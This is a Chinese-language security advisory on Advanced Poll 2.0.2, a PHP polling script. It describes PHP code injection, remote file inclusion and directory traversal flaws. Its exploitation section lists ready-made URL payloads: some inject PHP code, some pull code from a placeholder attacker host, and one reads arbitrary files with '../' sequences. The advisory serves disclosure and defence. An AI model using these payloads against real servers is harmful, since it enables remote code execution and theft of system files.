添加时间:
2005-08-16

系统编号:
WAVDB-00398
BUGTRAQ: 8890

影响版本:
Advanced Poll 2.0.2

程序介绍:

Advanced Poll是一款基于PHP的投票程序。

漏洞分析:

Advanced Poll由于不正确处理用户提交输入，远程攻击者可以利用这些漏洞获得敏感信息，包含远程PHP文件，或者执行PHP代码。
Advanced Poll包含的comments.php脚本对用户提交给'id'或'template_set'或'action'的变量缺少充分过滤，提交恶意PHP代码可导致以WEB权限执行。
‘admin/common.inc.php’脚本对用户提交的'basepath'变量缺少充分过滤，包含远程服务器上的任意文件，可导致以WEB权限执行任意命令。此脚本对&pollvars[lang]参数也没有正确过滤，提交包含多个'../'的数据可以WEB权限查看系统任意文件内容。

漏洞利用:

http://[target]/comments.php?id= ;[PHPCODE]//&template_set= ;[PHPCODE]//&action= ;[PHPCODE]//
http://[target]/booth.php?include_path=http://[attacker] 包含如下文件：
http://[attacker]/include/config.inc.php
和
http://[attacker]/include/class_poll.php
http://[target]/admin/common.inc.php?basepath=http://[attacker]
包含文件为：http://[attacker]/lang/english.php.
http://[target]/admin/common.inc.php?base_path=..&pollvars[lang]=../../../file/to/view

解决方案:
厂商补丁：
Proxy2.de
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://proxy2.de/scripts.php

信息来源:
<*来源：Frog Man （leseulfrog@hotmail.com）
链接：http://marc.theaimsgroup.com/?l=bugtraq&m=106728241710744&w=2*>